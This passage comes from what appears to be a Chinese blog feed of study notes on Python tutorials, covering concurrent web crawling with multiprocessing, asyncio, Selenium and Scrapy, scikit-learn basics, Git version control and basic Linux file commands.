http://mofanpy.com/tutorials/machine-learning/theano/20 多线程 (Threading) http://mofanpy.com/tutorials/python-basic/threading/21 多进程 (Multiprocessing) http://mofanpy.com/tutorials/python-basic/multiprocessing/22Linux 简易教学 http://mofanpy.com/tutorials/others/linux-basic/23 Tensorflow http://mofanpy.com/tutorials/machine-learning/tensorflow/24 生成模型 GAN 网络 http://mofanpy.com/tutorials/machine-learning/gan/25 Git 版本管理 http://mofanpy.com/tutorials/others/git/26 机器学习实战 http://mofanpy.com/tutorials/machine-learning/ML-practice/27 网页爬虫 http://mofanpy.com/tutorials/data-manipulation/scrapingTotal time: 7.4s

    多进程爬取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    unseen = set([base_url,])
    seen = set()

    pool = mp.Pool(4)
    count, t1 = 1, time.time()
    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break
    print('\nDistributed Crawling...')
    crawl_jobs = [pool.apply_async(crawl, args=(url,)) for url in unseen]
    html = [j.get() for j in crawl_jobs]

    print('\nDistributed Parsing...')
    parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]
    results = [j.get() for j in parse_jobs]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...

    4.2 加速爬虫: 异步加载 Asyncio

    之前我一直在想如何用 multiprocessing 或者 threading 加速我的爬虫, 也做过了一些小实验, 确实, 我们看到了不小的效率提升. 但是当我更加深入的时候, 我发现, Python 还提供了一个有力的工具, 叫做 asyncio. 这是一个仅仅使用单线程, 就能达到多线程/进程的效果的工具.

    它的原理, 简单说就是: 在单线程里使用异步计算, 下载网页的时候和处理网页的时候是不连续的, 更有效利用了等待下载的这段时间.

    那么, 我们今天就来尝试使用 asyncio 来替换掉 multiprocessing 或者 threading, 看看效果如何.

    png

    常规

import time


def job(t):
    print('Start job', t)
    time.sleep(t)
    print('Job', t, 'takes', t, 's')


def main():
    [job(t) for t in range(1, 3)]


t1 = time.time()
main()
print('NO async total time: ', time.time() - t1)
Start job 1
Job 1 takes 1 s
Start job 2
Job 2 takes 2 s
NO async total time:  3.010831594467163

    asyncio

Jupyter's support for async code is not great; switching to PyCharm
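If you would rather stay in Jupyter, one common workaround (my note, not from the original course; it assumes the third-party nest_asyncio package is installed) is to patch the notebook's already-running event loop so run_until_complete works:

# Hypothetical Jupyter workaround: nest_asyncio allows nested use of the
# event loop that Jupyter itself is already running.
import nest_asyncio
nest_asyncio.apply()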

import time
import asyncio


async def job(t):  # an async-style function (coroutine)
    print('Start job ', t)
    await asyncio.sleep(t)  # wait "t" seconds; other tasks run in the meantime
    print('Job ', t, ' takes ', t, ' s')


async def main(loop):  # an async-style function (coroutine)
    tasks = [
        loop.create_task(job(t)) for t in range(1, 3)
    ]  # create the tasks, but don't run them yet
    await asyncio.wait(tasks)  # run all tasks and wait for them to finish


t1 = time.time()
loop = asyncio.get_event_loop()  # create the loop
loop.run_until_complete(main(loop))  # run the loop
loop.close()  # close the loop
print("Async total time : ", time.time() - t1)
Start job  1
Start job  2
Job  1  takes  1  s
Job  2  takes  2  s
Async total time :  2.019124984741211

Fetching pages the normal way

import requests
import time

URL = 'https://mofanpy.com/'


def normal():
    for i in range(2):
        r = requests.get(URL)
        url = r.url
        print(url)


t1 = time.time()
normal()
print("Normal total time:", time.time() - t1)
https://mofanpy.com/
https://mofanpy.com/
Normal total time: 0.26386022567749023

Using asyncio

import aiohttp
import time
import asyncio

URL = 'https://mofanpy.com/'


async def job(session):
    response = await session.get(URL)  # wait here and switch to other tasks
    return str(response.url)


async def main(loop):
    async with aiohttp.ClientSession() as session:  # the official docs recommend one shared Session
        tasks = [loop.create_task(job(session)) for _ in range(2)]
        finished, unfinished = await asyncio.wait(tasks)
        all_results = [r.result() for r in finished]  # collect all results
        print(all_results)


t1 = time.time()
loop = asyncio.get_event_loop()
loop.run_until_complete(main(loop))
loop.close()
print("Async total time:", time.time() - t1)
['https://mofanpy.com/', 'https://mofanpy.com/']
Async total time: 0.1562364101409912

5.1 Advanced Crawling: Let Selenium Drive Your Browser for You

So when would you reach for Selenium? When you:

• find that ordinary methods can't fetch the content you want
• face a site playing hide-and-seek with you, with too much JavaScript-generated content
• need a crawler that browses like a human

The Katalon Recorder plugin records what you do in the browser. Back when I played online games I used a macro tool called 按键精灵 to automate lots of repetitive work; it saved my mouse, my keyboard, and of course my fingers, and I felt quietly smug watching everyone else click away. Katalon Recorder + Selenium works on the same idea: record your actions, then let the computer repeat them a thousand times.

Every click you make is recorded into a log. Then the magic happens: press the Export button and you get browser-automation code generated for you!

    png

    png

Installation

    selenium + Edge 浏览器_tk1023 的博客-CSDN 博客_edge selenium

    “Hello world”

from time import sleep
from selenium import webdriver

driver = webdriver.Edge()  # open the Edge browser

driver.get(r'https://www.baidu.com/')  # open https://www.baidu.com/

sleep(5)  # after 5 seconds
driver.close()  # close the browser

Controlling the browser from Python

from selenium import webdriver

driver = webdriver.Edge()  # open the Edge browser

# paste the code you just exported here
driver.get("https://mofanpy.com/")
driver.find_element_by_xpath(u"//img[@alt='强化学习 (Reinforcement Learning)']").click()
driver.find_element_by_link_text("About").click()
driver.find_element_by_link_text(u"赞助").click()
driver.find_element_by_link_text(u"教程 ▾").click()
driver.find_element_by_link_text(u"数据处理 ▾").click()
driver.find_element_by_link_text(u"网页爬虫").click()

# grab the page html; you can take a screenshot too
html = driver.page_source  # get html
driver.get_screenshot_as_file("./img/sreenshot1.png")
driver.close()

    png

Having to watch the browser replay these actions every time can be inconvenient, though. We can tell Selenium not to pop up a browser window and to work silently instead: define a few options before creating the driver and the browser sheds its body.

# the original author used Chrome here; with only Edge installed, this block won't run
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument("--headless")  # define headless

driver = webdriver.Chrome(options=chrome_options)
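Since these notes use Edge, a rough headless equivalent is sketched below (my assumption: Selenium 4's Edge options API is available; this is not part of the original course):

# Sketch: headless Edge with Selenium 4's options API (assumed installed)
from selenium import webdriver
from selenium.webdriver.edge.options import Options

edge_options = Options()
edge_options.add_argument("--headless")  # no visible browser window

driver = webdriver.Edge(options=edge_options)
driver.get("https://mofanpy.com/")
print(driver.title)
driver.quit()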

Selenium can do much more, such as filling in forms, driving the keyboard, and so on.
This tutorial is only an introduction and won't go into detail; if you want to dig deeper, head over to the official Selenium Python documentation site.

Finally, Selenium's strength is obvious by now: it conveniently replays your actions, and adding further ones is easy.

But it has drawbacks too; Selenium isn't always the right tool. Because it opens a real browser and loads far more than necessary, it is certainly slower than the other modules. If you need speed, avoid Selenium whenever you can.

5.2 Advanced Crawling: the Efficient, Carefree Scrapy Framework

    png

import scrapy


class MofanSpider(scrapy.Spider):
    name = "mofan"
    start_urls = [
        'https://mofanpy.com/',
    ]
    # unseen = set()
    # seen = set()  # the sets are no longer needed: Scrapy deduplicates automatically

    def parse(self, response):
        yield {  # return some results
            'title': response.css('h1::text').extract_first(default='Missing').strip().replace('"', ""),
            'url': response.url,
        }
        urls = response.css('a::attr(href)').re(r'^/.+?/$')  # find all sub urls
        for url in urls:
            yield response.follow(url, callback=self.parse)  # it will filter duplication automatically

This walkthrough gets you writing a Scrapy-style spider and through the door (you can run it as sketched below), but Scrapy is far more than just spiders; there is more to learn, and the best place for that is of course its own website.
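To try the spider above without generating a whole Scrapy project, one option (standard Scrapy API, though this exact snippet is my addition and the output filename is just an example) is to run it from a plain script:

# Run MofanSpider from a script (assumes the class above is in scope)
from scrapy.crawler import CrawlerProcess

process = CrawlerProcess(settings={
    "FEEDS": {"results.json": {"format": "json"}},  # write scraped items to JSON
})
process.crawl(MofanSpider)
process.start()  # blocks until the crawl finishes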

    ]]>
    @@ -9780,7 +9780,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88scikit-learn%EF%BC%89/ - 官网

Course

3 How to Choose a Machine Learning Method

Flowchart

png

• classification

• regression

• clustering

• dimensionality reduction

4 The General Learning Pattern

Importing a dataset

Inspect the iris features:

import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split  # formerly: from sklearn.cross_validation import train_test_split
from sklearn.neighbors import KNeighborsClassifier  # KNN, K-nearest neighbours

iris = datasets.load_iris()
iris_X = iris.data
iris_y = iris.target

iris_X[:2, :]
array([[5.1, 3.5, 1.4, 0.2],
       [4.9, 3. , 1.4, 0.2]])

Inspect the iris labels:

    iris_y
array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
       0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
       0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2])

train_test_split splits the dataset (training set / test set):

# training set : test set = 7 : 3
X_train, X_test, y_train, y_test = train_test_split(iris_X, iris_y, test_size=0.3)
y_train
array([1, 0, 2, 2, 2, 0, 2, 2, 2, 1, 1, 0, 0, 0, 0, 0, 0, 2, 0, 1, 0, 2,
       0, 0, 1, 0, 0, 1, 1, 2, 0, 1, 2, 2, 2, 2, 2, 2, 1, 2, 0, 0, 2, 2,
       0, 1, 1, 2, 2, 2, 2, 0, 0, 2, 1, 1, 1, 2, 2, 1, 0, 2, 1, 2, 0, 0,
       1, 0, 2, 1, 2, 0, 1, 2, 1, 2, 1, 0, 0, 1, 1, 2, 2, 1, 0, 2, 1, 1,
       0, 0, 1, 1, 1, 2, 0, 0, 2, 1, 2, 2, 1, 2, 1, 2, 2])

Classify with the KNN algorithm

knn = KNeighborsClassifier()
# fit: train the model
knn.fit(X_train, y_train)
# predict: generate predictions
knn.predict(X_test)
array([2, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 2, 0, 2, 2, 0, 1, 1,
       1, 0, 0, 1, 1, 0, 2, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,
       1])
    y_test
array([1, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 1, 0, 2, 2, 0, 1, 1,
       1, 0, 0, 1, 1, 0, 1, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,
       1])

The predictions closely match y_test; you can quantify this as shown below
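To put a number on "closely match", a quick check (my addition, not in the course notes):

import numpy as np

# fraction of test samples predicted correctly
print(np.mean(knn.predict(X_test) == y_test))  # same value as knn.score(X_test, y_test)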

5 The sklearn datasets module

from sklearn import datasets
from sklearn.linear_model import LinearRegression  # linear regression

loaded_data = datasets.load_boston()  # Boston house-price dataset
data_X = loaded_data.data
data_y = loaded_data.target

model = LinearRegression()
model.fit(data_X, data_y)

model.predict(data_X[:4, :])

# note: the original author forgot to split the dataset here; see the corrected sketch below

    array([30.00384338, 25.02556238, 30.56759672, 28.60703649])
    data_y[:4]
    array([24. , 21.6, 34.7, 33.4])
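A corrected version with a held-out test set (my sketch of the fix for the omission flagged above; note that load_boston was removed in scikit-learn 1.2, so this assumes an older version):

from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(data_X, data_y, test_size=0.3)
model = LinearRegression()
model.fit(X_train, y_train)          # fit on the training portion only
print(model.score(X_test, y_test))   # evaluate on data the model has not seen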

Generating a dataset

    import matplotlib.pyplot as plt

    plt.figure()
    X, y = datasets.make_regression(n_samples=100, n_features=1, n_targets=1, noise=10)
    plt.scatter(X, y)
    plt.show()

    png

6 Common model attributes and methods

from sklearn import datasets
from sklearn.linear_model import LinearRegression  # linear regression

loaded_data = datasets.load_boston()  # Boston house-price dataset
data_X = loaded_data.data
data_y = loaded_data.target

model = LinearRegression()
model.fit(data_X, data_y)

model.coef_: the slopes (coefficients)

coef_ and intercept_ are only meaningful after fit has been called; the sanity check below shows how they relate to predict

model.coef_  # the slope for each feature
array([-1.08011358e-01,  4.64204584e-02,  2.05586264e-02,  2.68673382e+00,
       -1.77666112e+01,  3.80986521e+00,  6.92224640e-04, -1.47556685e+00,
        3.06049479e-01, -1.23345939e-02, -9.52747232e-01,  9.31168327e-03,
       -5.24758378e-01])

model.intercept_: the intercept

model.intercept_  # intercept (where the fitted line crosses the Y axis)
    36.45948838509036
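These two attributes are exactly the parameters of the fitted linear model y = Xw + b; a quick sanity check (my addition):

import numpy as np

# a linear model's predictions are just X @ coef_ + intercept_
manual = data_X @ model.coef_ + model.intercept_
print(np.allclose(manual, model.predict(data_X)))  # True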

model.get_params(): view the parameters the model was defined with

    model.get_params()
    {'copy_X': True, 'fit_intercept': True, 'n_jobs': None, 'normalize': 'deprecated', 'positive': False}

model.score(): score what the model has learned

model.score(data_X, data_y)  # coefficient of determination R^2: how closely predictions match the true values
    0.7406426641094095

7 Normalization: standardizing data

    preprocessing.scale()

from sklearn import preprocessing  # preprocessing utilities
import numpy as np

a = np.array([[10, 2.7, 3.6],
              [-100, 5, -2],
              [120, 20, 40]], dtype=np.float64)
# each column is one feature
# feature 1 range: [-100, 120]
# feature 2 range: [2.7, 20]
# feature 3 range: [-2, 40]
# the feature ranges differ widely
preprocessing.scale(a)
array([[ 0.        , -0.85170713, -0.55138018],
       [-1.22474487, -0.55187146, -0.852133  ],
       [ 1.22474487,  1.40357859,  1.40351318]])

After standardization every feature sits on roughly the same scale; the quick check below confirms it
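A quick look at what scale() actually did (my addition): each column now has zero mean and unit variance.

scaled = preprocessing.scale(a)
print(scaled.mean(axis=0))  # approximately [0, 0, 0]
print(scaled.std(axis=0))   # [1, 1, 1]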

Example

from sklearn import preprocessing  # preprocessing utilities
import numpy as np
from sklearn.model_selection import train_test_split  # dataset splitting
from sklearn.datasets import make_classification  # synthetic data
from sklearn.svm import SVC  # Support Vector Classifier
import matplotlib.pyplot as plt  # visualization

X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
                           random_state=22, n_clusters_per_class=1, scale=100)
plt.figure()
plt.scatter(X[:, 0], X[:, 1], c=y)  # c=y colors each point by its class label
plt.show()

    png

X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
                           random_state=22, n_clusters_per_class=1, scale=1000)
X = preprocessing.scale(X)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.3)
clf = SVC()
clf.fit(X_train, y_train)
# learn from the training data, then evaluate on the test data
clf.score(X_test, y_test)
    0.9222222222222223

8 Cross-validation, part 1

Baseline

from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier

iris = load_iris()
X = iris.data
y = iris.target

X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=4)
knn = KNeighborsClassifier(n_neighbors=5)  # consider the 5 nearest neighbours
knn.fit(X_train, y_train)
y_pred = knn.predict(X_test)
knn.score(X_test, y_test)
    0.9736842105263158

Cross-validation

from sklearn.datasets import load_iris
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier

iris = load_iris()
X = iris.data
y = iris.target

knn = KNeighborsClassifier(n_neighbors=5)  # consider the 5 nearest neighbours
scores = cross_val_score(knn, X, y, cv=5, scoring="accuracy")  # accuracy on each of the 5 folds
scores
    array([0.96666667, 1.        , 0.93333333, 0.96666667, 1.        ])
scores.mean()  # average over the folds
    0.9733333333333334

Choosing the best parameter value

Compare accuracy

from sklearn.model_selection import cross_val_score
import matplotlib.pyplot as plt

k_range = range(1, 31)
k_scores = []
for k in k_range:
    knn = KNeighborsClassifier(n_neighbors=k)
    scores = cross_val_score(knn, X, y, cv=10, scoring="accuracy")
    k_scores.append(scores.mean())
plt.figure()
plt.plot(k_range, k_scores)
plt.xlabel("Value of K for KNN")
plt.ylabel('Cross-Validated Accuracy')
plt.show()

    png

• If K is too small, the model overfits: it chases individual, possibly noisy neighbours
• If K is too large, the model underfits: predictions get smoothed toward the overall majority (GridSearchCV can automate the search for K, as sketched below)
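The loop above is essentially a manual grid search; scikit-learn's GridSearchCV does the same in a few lines (standard API, but this snippet is my addition):

from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier

# cross-validated search over K = 1..30 with 10 folds and accuracy scoring
search = GridSearchCV(KNeighborsClassifier(),
                      param_grid={"n_neighbors": list(range(1, 31))},
                      cv=10, scoring="accuracy")
search.fit(X, y)
print(search.best_params_, search.best_score_)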

9 Cross-validation, part 2

The overfitting problem

from sklearn.model_selection import learning_curve  # visualize performance as training data grows
from sklearn.datasets import load_digits
from sklearn.svm import SVC
import matplotlib.pyplot as plt
import numpy as np

digits = load_digits()
X = digits.data
y = digits.target
train_sizes, train_loss, test_loss = learning_curve(
    SVC(gamma=0.01), X, y, cv=10, scoring='neg_mean_squared_error',
    train_sizes=[0.1, 0.25, 0.5, 0.75, 1])
train_loss_mean = -np.mean(train_loss, axis=1)
test_loss_mean = -np.mean(test_loss, axis=1)

plt.figure()
plt.plot(train_sizes, train_loss_mean, 'o-', color='r', label='Training')
plt.plot(train_sizes, test_loss_mean, 'o-', color='g', label='Cross-validation')
plt.xlabel('Training examples')
plt.ylabel('Loss')
plt.legend(loc='best')
plt.show()

    png

Overfitting shows up here: the training loss stays near zero while the cross-validation loss remains high even as the sample size grows

10 Cross-validation, part 3

from sklearn.model_selection import validation_curve
from sklearn.datasets import load_digits
from sklearn.svm import SVC
import matplotlib.pyplot as plt
import numpy as np

digits = load_digits()
X = digits.data
y = digits.target
param_range = np.logspace(-6, -2.3, 5)
train_loss, test_loss = validation_curve(
    SVC(), X, y, param_name='gamma', param_range=param_range, cv=10,
    scoring='neg_mean_squared_error')
train_loss_mean = -np.mean(train_loss, axis=1)
test_loss_mean = -np.mean(test_loss, axis=1)

plt.figure()
plt.plot(param_range, train_loss_mean, 'o-', color='r', label='Training')
plt.plot(param_range, test_loss_mean, 'o-', color='g', label='Cross-validation')
plt.xlabel('gamma')
plt.ylabel('Loss')
plt.legend(loc='best')
plt.show()

    png
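Instead of eyeballing the plot, the best value can be read off directly (my addition):

best_gamma = param_range[np.argmin(test_loss_mean)]  # gamma with the lowest cross-validation loss
print(best_gamma)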

11 Saving a model

    from sklearn import svm
    from sklearn import datasets

    clf = svm.SVC()
    iris = datasets.load_iris()
    X, y = iris.data, iris.target
    clf.fit(X, y)
    SVC()

Method 1: pickle

Export

import pickle

with open('save/clf.pickle', 'wb') as f:
    pickle.dump(clf, f)

Import

with open('save/clf.pickle', 'rb') as f:
    clf2 = pickle.load(f)
clf2.predict(X[0:1])
    array([0])

Method 2: joblib

Export

    import joblib

    joblib.dump(clf, 'save/clf.pkl')
    ['save/clf.pkl']

Import

    clf3 = joblib.load('save/clf.pkl')
    clf3.predict(X[0:1])
    array([0])
    ]]>
    @@ -9834,7 +9834,7 @@ /posts/Git-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88git%EF%BC%89/ - 官网

    Git 版本管理 教程系列 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Git 代码版本管理教程

    Git (git-scm.com)

Course

Installing Git

    Ubuntu:

    sudo apt-get install git-all

Check your user name and email

User name:

    $ git config user.name
    metal-cell

Email:

    $ git config user.email
    XXX@qq.com

Git workflow diagram

    png

• Untracked: not yet tracked
• Unmodified: unchanged
• Modified: changed
• Staged: staged, ready to commit

Creating/modifying a repository

    $ git init
    Initialized empty Git repository in D:/Study/0th-year-master/gitTUT/.git/

    png

Create a new file 1.py

    png

git status: check the repository's state

    $ git status
    On branch master

    No commits yet

    Untracked files:
    (use "git add <file>..." to include in what will be committed)

    1.py

    nothing added to commit but untracked files present (use "git add" to track)

    png

git add: stage files into the repository

Right now 1.py is not tracked by the repository (unstaged), so we use add to put it into the staging area (staged):

    $ git add 1.py

    png

    $ git status
    On branch master

    No commits yet

    Changes to be committed:
    (use "git rm --cached <file>..." to unstage)

    new file: 1.py

git add . stages every not-yet-added file in the folder in one go

$ git add .

git commit: commit the change

    $ git commit -m "create 1.py"
    [master (root-commit) 3520206] create 1.py
    1 file changed, 0 insertions(+), 0 deletions(-)
    create mode 100644 1.py

    png

Recording changes (log & diff)

The change history: log

    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

Now make a change to 1.py:

    png

status then shows that this change has not been committed yet

    $ git status
    On branch master
    Changes not staged for commit:
    (use "git add <file>..." to update what will be committed)
    (use "git checkout -- <file>..." to discard changes in working directory)

    modified: 1.py

    no changes added to commit (use "git add" and/or "git commit -a")

Stage (add) the change so it can be committed, then commit it:

    $ git add 1.py
    $ git commit -m "change 1"
    [master 2b5d3bc] change 1
    1 file changed, 1 insertion(+)

    png

Check the log again: both create 1.py and change 1 now show up, together with each commit's ID, Author, and Date.

    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 12:15:33 2022 +0800

    change 1

    commit XXXX
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

Deleted code is recorded as well. For example, change a = 1 to a = 2, then add a new line b = 1.

    png

View unstaged changes

    $ git diff
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    png

View staged changes (--cached)

To see how the already-staged changes differ from the last commit, stage everything and run $ git diff --cached:

$ git add .
$ git diff --cached
diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

View staged & unstaged changes together (HEAD)

There is also a way to see both staged and unstaged changes at once. Modify 1.py once more, but do not add it:

    png

    png

# compare the three diff variants
    $ git diff HEAD # staged & unstaged
    diff --git a/1.py b/1.py
    index d25d49e..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,3 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    +c = b
    \ No newline at end of file
    $ git diff  # unstaged
    diff --git a/1.py b/1.py
    index 61ce15f..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1,2 +1,3 @@
    a = 2
    -b = 1
    \ No newline at end of file
    +b = 1
    +c = b
    \ No newline at end of file
    $ git diff --cached  # staged
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

For the next section, keep these changes: add everything into the staged state and commit.

    $ git add .
    $ git commit -m "change 2"
    [master 8f0a599] change 2
    1 file changed, 3 insertions(+), 1 deletion(-)

    png

Going back in time

Amending a committed version

Sometimes we forget something: we make a commit, then realize another file should have been part of it. Let's simulate that. In the last section our latest commit was change 2; now we want to add one more file and fold that change into change 2 as well. So copy 1.py, rename the copy 2.py, stage 2.py, and use --amend to merge this change into the earlier change 2.

    png

    $ git add 2.py
    $ git commit --amend --no-edit
    [master dc47039] change 2
    Date: Sat Aug 13 12:41:55 2022 +0800
    2 files changed, 6 insertions(+), 1 deletion(-)
    create mode 100644 2.py

--no-edit: keep the old message and merge straight into the previous commit

    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

reset: going back to before an add

Sometimes we add a change, regret it, and want to amend the content before staging again. We can return to the state before the add. For example, add one line to 1.py:

    png

Then add it (staged) and roll back to before the add:

    $ git add 1.py
    $ git status -s
    M 1.py
    $ git reset 1.py
    Unstaged changes after reset:
    M 1.py
    $ git status -s
    M 1.py

    png

reset: going back to before a commit

    png

Every commit has its own id. HEAD is a pointer marking which commit the current state sits on; the newest commit is at the far right. Going back in time means moving HEAD backwards and resetting to that earlier position.

    $ git reset --hard HEAD
    HEAD is now at dc47039 change 2

View the full log:

    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

Go back to 2b5d3bc change 1:

    $ git reset --hard HEAD^
    HEAD is now at 2b5d3bc change 1

    png

Using the commit id:

    $ git reset --hard 2b5d3bc
    HEAD is now at 2b5d3bc change 1

"Back to the future": rescuing the vanished change 2

git reflog: view every movement of HEAD

    $ git reflog
    2b5d3bc (HEAD -> master) HEAD@{0}: reset: moving to 2b5d3bc
    2b5d3bc (HEAD -> master) HEAD@{1}: reset: moving to HEAD^
    dc47039 HEAD@{2}: reset: moving to HEAD
    dc47039 HEAD@{3}: commit (amend): change 2
    8f0a599 HEAD@{4}: commit: change 2
    2b5d3bc (HEAD -> master) HEAD@{5}: commit: change 1
    3520206 HEAD@{6}: commit (initial): create 1.py

Return to change 2:

    $ git reset --hard dc47039
    HEAD is now at dc47039 change 2

    png

Going back for a single file (checkout)

    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

checkout 1.py from change 1:

    $ git checkout 2b5d3bc -- 1.py

    png

Add the line # I went back to change 1 to 1.py, then add and commit 1.py:

    png

Notice that, unlike with reset, our change 2 has not disappeared; only 1.py has gone back to the past and rewritten the future.

    ]]>
    @@ -9861,7 +9861,7 @@ /posts/Linux-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88linux%EF%BC%89/ - 官网

    Linux 简易教学 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Linux 简易教学

Course

Opening a Terminal window in Ubuntu

    Ctrl+Shift+T

    png

Working with files

The Terminal starts in the Home folder shown in the file manager; use pwd to print the current path

    gz@ubuntu:~$ pwd
    /home/gz

    png

The cd command

With cd we can easily switch between folders in the Terminal

    gz@ubuntu:~$ cd Documents
    gz@ubuntu:~/Documents$

On the next line, the ~/Documents in front of the $ tells you that you are now inside Documents; the commands you run next take effect in this directory.

cd ..: go up one directory

    gz@ubuntu:~/Documents$ cd ..
    gz@ubuntu:~$

cd into a subfolder

    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$

    png

cd -: return to the directory you were just in

    gz@ubuntu:~/Documents/folder1$ cd -
    /home/gz
    gz@ubuntu:~$

cd ../..: go up two levels

    gz@ubuntu:~$ cd Documents/folder1
    gz@ubuntu:~/Documents/folder1$ cd ../..
    gz@ubuntu:~$

cd ~: go to the Home folder

    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

cd with an absolute path

    gz@ubuntu:~/Documents/folder1$ cd ~
    gz@ubuntu:~$

The ls command

List what is inside a folder

    png

    gz@ubuntu:~/Documents$ ls
    file1 folder1

ls -l (short for long): print a detailed listing

gz@ubuntu:~/Documents$ ls -l
total 4
-rw-rw-r-- 1 gz gz    0 Aug 11 21:32 file1
drwxrwxr-x 2 gz gz 4096 Aug 11 21:12 folder1

ls -a (short for all): show every file, including hidden ones (names starting with .)

    gz@ubuntu:~/Documents$ ls -a
    . .. file1 folder1

ls -lh (h for human-readable): sizes formatted for humans

gz@ubuntu:~/Documents$ ls -lh
total 4.0K
-rw-rw-r-- 1 gz gz    0 Aug 11 21:32 file1
drwxrwxr-x 2 gz gz 4.0K Aug 11 21:12 folder1

ls --help: show the help text

    gz@ubuntu:~/Documents$ ls --help

touch: create files

Create one empty file

    gz@ubuntu:~/Documents$ touch file2

Create several empty files at once, separated by spaces

    gz@ubuntu:~/Documents$ touch file3 file4 file5

    png

cp: copy

cp (copy) copies files or folders; the usual form is copying an "old file" to a "new file"

    gz@ubuntu:~/Documents$ cp file1 file1copy

    png

cp -i (interactive)

Note: if file1copy already exists, plain cp silently overwrites it. To be asked before overwriting, add the -i option to cp:

    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? n
    gz@ubuntu:~/Documents$ cp -i file1 file1copy
    cp: overwrite 'file1copy'? y

Copy a file into a folder

    gz@ubuntu:~/Documents$ cp file1 folder1/

    png

To copy a folder, add -R (recursive)

Wrong:

    gz@ubuntu:~/Documents$ cp folder1/ folder2/
    cp: -r not specified; omitting directory 'folder1/'

Right:

    gz@ubuntu:~/Documents$ cp -R folder1/ folder2/

    png

*: copy several files by wildcard

    gz@ubuntu:~/Documents$ cp file* folder2/

    png

Pick out several specific files and copy them into a folder

    gz@ubuntu:~/Documents$ cp file1copy file2 folder1/

    png

mv: move (cut)

Move into a folder

    gz@ubuntu:~/Documents$ mv file1 folder1/

Renaming a file

Move the file to where it already is, but under a new name

    gz@ubuntu:~/Documents$ mv file1 file1rename

mkdir: create a folder

    gz@ubuntu:~/Documents$ mkdir folder2

Create a folder inside a folder

    gz@ubuntu:~/Documents$ mkdir folder2/f2

    png

rmdir: remove a folder

The folder must be empty, or the command fails

Trying to remove a non-empty folder:

    gz@ubuntu:~/Documents$ rmdir folder2
    rmdir: failed to remove 'folder2': Directory not empty

Removing an empty folder:

    gz@ubuntu:~/Documents$ rmdir folder2/f2

rm: remove files

